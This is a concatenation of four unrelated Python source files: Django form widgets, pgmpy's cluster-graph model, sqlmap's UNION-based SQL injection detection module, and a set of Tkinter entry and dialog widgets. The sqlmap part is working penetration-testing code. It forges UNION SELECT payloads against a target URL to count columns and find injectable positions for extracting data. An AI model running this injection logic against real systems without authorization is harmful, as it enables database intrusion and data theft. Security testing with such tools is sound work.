subwidgets.append(widget.get_context(widget_name, widget_value, widget_attrs)['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def id_for_label(self, id_):
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [
widget.value_from_datadict(data, files, name + widget_name)
for widget_name, widget in zip(self.widgets_names, self.widgets)
]
def value_omitted_from_data(self, data, files, name):
return all(
widget.value_omitted_from_data(data, files, name + widget_name)
for widget_name, widget in zip(self.widgets_names, self.widgets)
)
def decompress(self, value):
"""
Return a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"""
Media for a multiwidget is the combination of all media of the
subwidgets.
"""
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super().__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
class SplitDateTimeWidget(MultiWidget):
"""
A widget that splits datetime input into two <input type="text"> boxes.
"""
supports_microseconds = False
template_name = 'django/forms/widgets/splitdatetime.html'
def __init__(self, attrs=None, date_format=None, time_format=None, date_attrs=None, time_attrs=None):
widgets = (
DateInput(
attrs=attrs if date_attrs is None else date_attrs,
format=date_format,
),
TimeInput(
attrs=attrs if time_attrs is None else time_attrs,
format=time_format,
),
)
super().__init__(widgets)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time()]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A widget that splits datetime input into two <input type="hidden"> inputs.
"""
template_name = 'django/forms/widgets/splithiddendatetime.html'
def __init__(self, attrs=None, date_format=None, time_format=None, date_attrs=None, time_attrs=None):
super().__init__(attrs, date_format, time_format, date_attrs, time_attrs)
for widget in self.widgets:
widget.input_type = 'hidden'
class SelectDateWidget(Widget):
"""
A widget that splits date input into three <select> boxes.
This also serves as an example of a Widget that has more than one HTML
element and hence implements value_from_datadict.
"""
none_value = ('', '---')
month_field = '%s_month'
day_field = '%s_day'
year_field = '%s_year'
template_name = 'django/forms/widgets/select_date.html'
input_type = 'select'
select_widget = Select
date_re = _lazy_re_compile(r'(\d{4}|0)-(\d\d?)-(\d\d?)$')
def __init__(self, attrs=None, years=None, months=None, empty_label=None):
self.attrs = attrs or {}
# Optional list or tuple of years to use in the "year" select box.
if years:
self.years = years
else:
this_year = datetime.date.today().year
self.years = range(this_year, this_year + 10)
# Optional dict of months to use in the "month" select box.
if months:
self.months = months
else:
self.months = MONTHS
# Optional string, list, or tuple to use as empty_label.
if isinstance(empty_label, (list, tuple)):
if not len(empty_label) == 3:
raise ValueError('empty_label list/tuple must have 3 elements.')
self.year_none_value = ('', empty_label[0])
self.month_none_value = ('', empty_label[1])
self.day_none_value = ('', empty_label[2])
else:
if empty_label is not None:
self.none_value = ('', empty_label)
self.year_none_value = self.none_value
self.month_none_value = self.none_value
self.day_none_value = self.none_value
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
date_context = {}
year_choices = [(i, str(i)) for i in self.years]
if not self.is_required:
year_choices.insert(0, self.year_none_value)
year_name = self.year_field % name
date_context['year'] = self.select_widget(attrs, choices=year_choices).get_context(
name=year_name,
value=context['widget']['value']['year'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % year_name},
)
month_choices = list(self.months.items())
if not self.is_required:
month_choices.insert(0, self.month_none_value)
month_name = self.month_field % name
date_context['month'] = self.select_widget(attrs, choices=month_choices).get_context(
name=month_name,
value=context['widget']['value']['month'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % month_name},
)
day_choices = [(i, i) for i in range(1, 32)]
if not self.is_required:
day_choices.insert(0, self.day_none_value)
day_name = self.day_field % name
date_context['day'] = self.select_widget(attrs, choices=day_choices,).get_context(
name=day_name,
value=context['widget']['value']['day'],
attrs={**context['widget']['attrs'], 'id': 'id_%s' % day_name},
)
subwidgets = []
for field in self._parse_date_fmt():
subwidgets.append(date_context[field]['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def format_value(self, value):
"""
Return a dict containing the year, month, and day of the current value.
Use dict instead of a datetime to allow invalid dates such as February
31 to display correctly.
"""
year, month, day = None, None, None
if isinstance(value, (datetime.date, datetime.datetime)):
year, month, day = value.year, value.month, value.day
elif isinstance(value, str):
match = self.date_re.match(value)
if match:
# Convert any zeros in the date to empty strings to match the
# empty option value.
year, month, day = [int(val) or '' for val in match.groups()]
else:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
d = datetime.datetime.strptime(value, input_format)
except ValueError:
pass
else:
year, month, day = d.year, d.month, d.day
return {'year': year, 'month': month, 'day': day}
@staticmethod
def _parse_date_fmt():
fmt = get_format('DATE_FORMAT')
escaped = False
for char in fmt:
if escaped:
escaped = False
elif char == '\\':
escaped = True
elif char in 'Yy':
yield 'year'
elif char in 'bEFMmNn':
yield 'month'
elif char in 'dj':
yield 'day'
def id_for_label(self, id_):
for first_select in self._parse_date_fmt():
return '%s_%s' % (id_, first_select)
return '%s_month' % id_
def value_from_datadict(self, data, files, name):
y = data.get(self.year_field % name)
m = data.get(self.month_field % name)
d = data.get(self.day_field % name)
if y == m == d == '':
return None
if y is not None and m is not None and d is not None:
input_format = get_format('DATE_INPUT_FORMATS')[0]
try:
date_value = datetime.date(int(y), int(m), int(d))
except ValueError:
# Return pseudo-ISO dates with zeros for any unselected values,
# e.g. '2017-0-23'.
return '%s-%s-%s' % (y or 0, m or 0, d or 0)
date_value = datetime_safe.new_date(date_value)
return date_value.strftime(input_format)
return data.get(name)
def value_omitted_from_data(self, data, files, name):
return not any(
('{}_{}'.format(name, interval) in data)
for interval in ('year', 'month', 'day')
)
|
|
#!/usr/bin/env python3
from collections import defaultdict
import numpy as np
from pgmpy.base import UndirectedGraph
from pgmpy.exceptions import CardinalityError
from pgmpy.factors import factor_product
from pgmpy.extern.six.moves import filter, range, zip
class ClusterGraph(UndirectedGraph):
r"""
Base class for representing Cluster Graph.
Cluster graph is an undirected graph which is associated with a subset of variables. The graph contains undirected
edges that connects clusters whose scopes have a non-empty intersection.
Formally, a cluster graph is :math:`\mathcal{U}` for a set of factors :math:`\Phi` over :math:`\mathcal{X}` is an
undirected graph, each of whose nodes :math:`i` is associated with a subset :math:`C_i \subseteq X`. A cluster
graph must be family-preserving - each factor :math:`\phi \in \Phi` must be associated with a cluster C, denoted
:math:`\alpha(\phi)`, such that :math:`Scope[\phi] \subseteq C_i`. Each edge between a pair of clusters :math:`C_i`
and :math:`C_j` is associated with a sepset :math:`S_{i,j} \subseteq C_i \cap C_j`.
Parameters
----------
data: input graph
Data to initialize graph. If data=None (default) an empty graph is created. The data is an edge list
Examples
--------
Create an empty ClusterGraph with no nodes and no edges
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
G can be grown by adding clique nodes.
**Nodes:**
Add a tuple (or list or set) of nodes as single clique node.
>>> G.add_node(('a', 'b', 'c'))
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
**Edges:**
G can also be grown by adding edges.
>>> G.add_edge(('a', 'b', 'c'), ('a', 'b'))
or a list of edges
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
def __init__(self, ebunch=None):
super(ClusterGraph, self).__init__()
if ebunch:
self.add_edges_from(ebunch)
self.factors = []
def add_node(self, node, **kwargs):
"""
Add a single node to the cluster graph.
Parameters
----------
node: node
A node should be a collection of nodes forming a clique. It can be
a list, set or tuple of nodes
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_node(('a', 'b', 'c'))
"""
if not isinstance(node, (list, set, tuple)):
raise TypeError('Node can only be a list, set or tuple of nodes forming a clique')
node = tuple(node)
super(ClusterGraph, self).add_node(node, **kwargs)
def add_nodes_from(self, nodes, **kwargs):
"""
Add multiple nodes to the cluster graph.
Parameters
----------
nodes: iterable container
A container of nodes (list, dict, set, etc.).
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
"""
for node in nodes:
self.add_node(node, **kwargs)
def add_edge(self, u, v, **kwargs):
"""
Add an edge between two clique nodes.
Parameters
----------
u, v: nodes
Nodes can be any list or set or tuple of nodes forming a clique.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
set_u = set(u)
set_v = set(v)
if set_u.isdisjoint(set_v):
raise ValueError('No sepset found between these two edges.')
super(ClusterGraph, self).add_edge(u, v)
def add_factors(self, *factors):
"""
Associate a factor to the graph.
See factors class for the order of potential values
Parameters
----------
*factor: pgmpy.factors.factors object
A factor object on any subset of the variables of the model which
is to be associated with the model.
Returns
-------
None
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> student.add_node(('Alice', 'Bob'))
>>> factor = Factor(['Alice', 'Bob'], cardinality=[3, 2],
... values=np.random.rand(6))
>>> student.add_factors(factor)
"""
for factor in factors:
factor_scope = set(factor.scope())
nodes = [set(node) for node in self.nodes()]
if factor_scope not in nodes:
raise ValueError('Factors defined on clusters of variable not'
'present in model')
self.factors.append(factor)
def get_factors(self, node=None):
"""
Return the factors that have been added till now to the graph.
If node is not None, it would return the factor corresponding to the
given node.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = Factor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = Factor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = Factor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_factors()
>>> G.get_factors(node=('a', 'b', 'c'))
"""
if node is None:
return self.factors
else:
nodes = [set(n) for n in self.nodes()]
if set(node) not in nodes:
raise ValueError('Node not present in Cluster Graph')
factors = filter(lambda x: set(x.scope()) == set(node), self.factors)
return next(factors)
def remove_factors(self, *factors):
"""
Removes the given factors from the added factors.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> factor = Factor(['Alice', 'Bob'], cardinality=[2, 2],
... value=np.random.rand(4))
>>> student.add_factors(factor)
>>> student.remove_factors(factor)
"""
for factor in factors:
self.factors.remove(factor)
def get_cardinality(self):
"""
Returns a dictionary with the given factors as keys and their respective
cardinality as values.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> student = ClusterGraph()
>>> factor = Factor(['Alice', 'Bob'], cardinality=[2, 2],
... values=np.random.rand(4))
>>> student.add_node(('Alice', 'Bob'))
>>> student.add_factors(factor)
>>> student.get_cardinality()
defaultdict(<class 'int'>, {'Bob': 2, 'Alice': 2})
"""
cardinalities = defaultdict(int)
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
cardinalities[variable] = cardinality
return cardinalities
def get_partition_function(self):
r"""
Returns the partition function for a given undirected graph.
A partition function is defined as
.. math:: \sum_{X}(\prod_{i=1}^{m} \phi_i)
where m is the number of factors present in the graph
and X are all the random variables present.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors import Factor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = Factor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = Factor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = Factor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_partition_function()
"""
if self.check_model():
factor = self.factors[0]
factor = factor_product(factor, *[self.factors[i] for i in range(1, len(self.factors))])
return np.sum(factor.values)
def check_model(self):
"""
Check the model for various errors. This method checks for the following
errors. In the same time also updates the cardinalities of all the random
variables.
* Checks if clique potentials are defined for all the cliques or not.
* Check for running intersection property is not done explicitly over
here as it done in the add_edges method.
Returns
-------
check: boolean
True if all the checks are passed
"""
for clique in self.nodes():
if self.get_factors(clique):
pass
else:
raise ValueError('Factors for all the cliques or clusters not'
'defined.')
if len(self.factors) != len(self.nodes()):
raise ValueError('One to one mapping of factor to clique or cluster'
'is not there.')
cardinalities = self.get_cardinality()
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
if (cardinalities[variable] != cardinality):
raise CardinalityError(
'Cardinality of variable %s not matching among factors' % variable)
return True
|
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import random
import re
from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import isNullValue
from lib.core.common import listToStrValue
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastResponseDBMSError
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import PAYLOAD
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.settings import MIN_RATIO
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.settings import NULL
from lib.core.settings import ORDER_BY_STEP
from lib.core.unescaper import unescaper
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
"""
Finds number of columns affected by UNION based injection
"""
retVal = None
def _orderByTechnique():
def _orderByTest(cols):
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
if _orderByTest(1) and not _orderByTest(randomInt()):
infoMsg = "ORDER BY technique seems to be usable. "
infoMsg += "This should reduce the time needed "
infoMsg += "to find the right number "
infoMsg += "of query columns. Automatically extending the "
infoMsg += "range for current UNION query injection technique test"
singleTimeLogMessage(infoMsg)
lowCols, highCols = 1, ORDER_BY_STEP
found = None
while not found:
if _orderByTest(highCols):
lowCols = highCols
highCols += ORDER_BY_STEP
else:
while not found:
mid = highCols - (highCols - lowCols) / 2
if _orderByTest(mid):
lowCols = mid
else:
highCols = mid
if (highCols - lowCols) < 2:
found = lowCols
return found
try:
pushValue(kb.errorIsNone)
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if lowerCount == 1:
found = kb.orderByColumns or _orderByTechnique()
if found:
kb.orderByColumns = found
infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
singleTimeLogMessage(infoMsg)
return found
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO
pages = {}
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
if not isNullValue(kb.uChar):
for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
if len(filter(lambda x: x[1], contains)) == 1:
retVal = filter(lambda x: x[1], contains)[0][0]
break
if not retVal:
if min_ in ratios:
ratios.pop(ratios.index(min_))
if max_ in ratios:
ratios.pop(ratios.index(max_))
minItem, maxItem = None, None
for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item
if all(map(lambda x: x == min_ and x != max_, ratios)):
retVal = maxItem[0]
elif all(map(lambda x: x != min_ and x == max_, ratios)):
retVal = minItem[0]
elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
deviation = stdev(ratios)
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
if min_ < lower:
retVal = minItem[0]
if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]
finally:
kb.errorIsNone = popValue()
if retVal:
infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
singleTimeLogMessage(infoMsg)
return retVal
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None
positions = range(0, count)
# Unbiased approach for searching appropriate usable column
random.shuffle(positions)
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
if vector:
break
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(charCount)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(charCount)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
return validPayload, vector
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None
vector = None
# Confirm the union SQL injection and get the exact column
# position which can be used to extract data
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full union
# SQL injection position
if not validPayload:
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
return validPayload, vector
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
"""
validPayload = None
vector = None
# In case that user explicitly stated number of columns affected
if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart
else:
count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE)
if count:
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]):
warnMsg = "if UNION based SQL injection is not detected, "
warnMsg += "please consider "
if not conf.uChar and count > 1 and kb.uChar == NULL:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
test = readInput(message, default="Y")
if test[0] not in ("y", "Y"):
warnMsg += "usage of option '--union-char' "
warnMsg += "(e.g. '--union-char=1') "
else:
conf.uChar = kb.uChar = str(randomInt(2))
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not conf.dbms:
if not conf.uChar:
warnMsg += "and/or try to force the "
else:
warnMsg += "forcing the "
warnMsg += "back-end DBMS (e.g. '--dbms=mysql') "
if not all([validPayload, vector]) and not warnMsg.endswith("consider "):
singleTimeWarnMessage(warnMsg)
return validPayload, vector
def unionTest(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 3*50 times
"""
if conf.direct:
return
kb.technique = PAYLOAD.TECHNIQUE.UNION
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload)
return validPayload, vector
|
|
# Various useful small widgets
#
# Written by Konrad Hinsen <hinsen@cnrs-orleans.fr>
# Last revision: 2000-10-18
#
_undocumented = 1
import Tkinter, Dialog, FileDialog
import copy, os, string
class FilenameEntry(Tkinter.Frame):
"""Filename entry widget
Constructor: FilenameEntry(|master|, |text|, |pattern|,
|must_exist_flag|=1)
Arguments:
|master| -- the master widget
|text| -- the label in front of the filename box
|pattern| -- the filename matching pattern that determines the
file list in the file selection dialog
|must_exists_flag| -- allow only names of existing files
A FilenameEntry widget consists of three parts: an identifying
label, a text entry field for the filename, and a button labelled
'browse' which call a file selection dialog box for picking a file
name.
"""
def __init__(self, master, text, browse_pattern = '*', must_exist = 1,
**attr):
self.pattern = browse_pattern
self.must_exist = must_exist
newattr = copy.copy(attr)
newattr['text'] = text
Tkinter.Frame.__init__(self, master)
apply(Tkinter.Label, (self,), newattr).pack(side=Tkinter.LEFT)
self.filename = Tkinter.StringVar()
Tkinter.Button(self, text="Browse...",
command=self.browse).pack(side=Tkinter.RIGHT)
newattr = copy.copy(attr)
newattr['textvariable'] = filename
entry = apply(Tkinter.Entry, (self,), newattr)
entry.pack(side=Tkinter.RIGHT, expand=1, fill=Tkinter.X)
entry.icursor("end")
def browse(self):
file = FileDialog.LoadFileDialog(self).go(pattern=self.pattern)[0]
if file:
self.filename.set(file)
def get(self):
"""Return the current filename. If |must_exist_flag| is true,
verify that the name refers to an existing file.
Otherwise an error message is displayed and a ValueError is raised.
"""
filename = self.filename.get()
if self.must_exist and not os.path.exists(filename):
Dialog.Dialog(self, title='File not found',
text='The file "' + filename + '" does not exist.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return filename
class FloatEntry(Tkinter.Frame):
"""An entry field for float numbers
Constructor: FloatEntry(|master|, |text|, |initial|=None,
|lower|=None, |upper|=None)
Arguments:
|master| -- the master widget
|text| -- the label in front of the entry field
|initial| -- an optional initial value (default: blank field)
|upper| -- an optional upper limit for the value
|lower| -- an optional lower limit for the value
A FloatEntry widget consists of a label followed by a text entry
field.
"""
def __init__(self, master, text, init = None, lower=None, upper=None,
name = None, **attr):
self.text = text
self.lower = lower
self.upper = upper
if name is None:
name = text
self.name = name
newattr = copy.copy(attr)
newattr['text'] = text
Tkinter.Frame.__init__(self, master)
apply(Tkinter.Label, (self,), newattr).pack(side=Tkinter.LEFT)
self.value = Tkinter.DoubleVar()
if init is not None:
self.value.set(init)
newattr = copy.copy(attr)
newattr['textvariable'] = self.value
self.entry = apply(Tkinter.Entry, (self,), newattr)
self.entry.pack(side=Tkinter.RIGHT, anchor=Tkinter.E,
expand=1, fill=Tkinter.X)
self.entry.icursor("end")
def bind(self, sequence=None, func=None, add=None):
self.entry.bind(sequence, func, add)
def set(self, value):
"Set the value to |value|."
return self.value.set(value)
def get(self):
"""Return the current value, verifying that it is a number
and between the specified limits. Otherwise an error message
is displayed and a ValueError is raised."""
try:
value = self.value.get()
except (Tkinter.TclError, ValueError):
Dialog.Dialog(self, title='Illegal value',
text='The value of "' + self.name +
'" must be a number.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
range_check = 0
if self.lower is not None and value < self.lower:
range_check = -1
if self.upper is not None and value > self.upper:
range_check = 1
if range_check != 0:
text = 'The value of "' + self.name + '" must not be '
if range_check < 0:
text = text + 'smaller than ' + `self.lower` + '.'
else:
text = text + 'larger than ' + `self.upper` + '.'
Dialog.Dialog(self, title='Value out of range', text=text,
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return value
class IntEntry(FloatEntry):
"""An entry field for integer numbers
Constructor: IntEntry(|master|, |text|, |initial|=None,
|lower|=None, |upper|=None)
Arguments:
|master| -- the master widget
|text| -- the label in front of the entry field
|initial| -- an optional initial value (default: blank field)
|upper| -- an optional upper limit for the value
|lower| -- an optional lower limit for the value
A IntEntry widget consists of a label followed by a text entry
field.
"""
def get(self):
"""Return the current value, verifying that it is an integer
and between the specified limits. Otherwise an error message
is displayed and a ValueError is raised."""
value = FloatEntry.get(self)
ivalue = int(value)
if ivalue != value:
Dialog.Dialog(self, title='Illegal value',
text='The value of "' + self.name +
'" must be an integer.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return ivalue
class ButtonBar(Tkinter.Frame):
"""A horizontal array of buttons
Constructor: ButtonBar(|master|, |left_button_list|, |right_button_list|)
Arguments:
|master| -- the master widget
|left_button_list| -- a list of (text, action) tuples specifying the
buttons on the left-hand side of the button bar
|right_button_list| -- a list of (text, action) tuples specifying the
buttons on the right-hand side of the button bar
"""
def __init__(self, master, left_button_list, right_button_list):
Tkinter.Frame.__init__(self, master, bd=2, relief=Tkinter.SUNKEN)
for button, action in left_button_list:
Tkinter.Button(self, text=button,
command=action).pack(side=Tkinter.LEFT)
for button, action in right_button_list:
Tkinter.Button(self, text=button,
command=action).pack(side=Tkinter.RIGHT)
class StatusBar(Tkinter.Frame):
"""A status bar
Constructor: StatusBar(|master|)
Arguments:
|master| -- the master widget
A status bar can be used to inform the user about the status of an
ongoing calculation. A message can be displayed with set() and
removed with clear(). In both cases, the StatusBar object makes
sure that the change takes place immediately. While a message
is being displayed, the cursor form is changed to a watch.
"""
def __init__(self, master):
Tkinter.Frame.__init__(self, master, bd=2, relief=Tkinter.RAISED)
self.text = Tkinter.Label(self, text='')
self.text.pack(side=Tkinter.LEFT, expand=Tkinter.YES)
def set(self, text):
self.text.configure(text = text)
self.text.update_idletasks()
self.master.configure(cursor='watch')
self.update()
self.update_idletasks()
def clear(self):
self.text.configure(text = '')
self.text.update_idletasks()
self.master.configure(cursor='top_left_arrow')
self.update_idletasks()
#
# The following class was taken from the Pythonware Tkinter introduction
#
class ModalDialog(Tkinter.Toplevel):
def __init__(self, parent, title = None):
Tkinter.Toplevel.__init__(self, parent)
self.transient(parent)
if title:
self.title(title)
self.parent = parent
self.result = None
body = Tkinter.Frame(self)
self.initial_focus = self.body(body)
body.pack(padx=5, pady=5)
self.buttonbox()
self.grab_set()
if not self.initial_focus:
self.initial_focus = self
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.initial_focus.focus_set()
self.wait_window(self)
#
# construction hooks
def body(self, master):
# create dialog body. return widget that should have
# initial focus. this method should be overridden
pass
def buttonbox(self):
# add standard button box. override if you don't want the
# standard buttons
box = Tkinter.Frame(self)
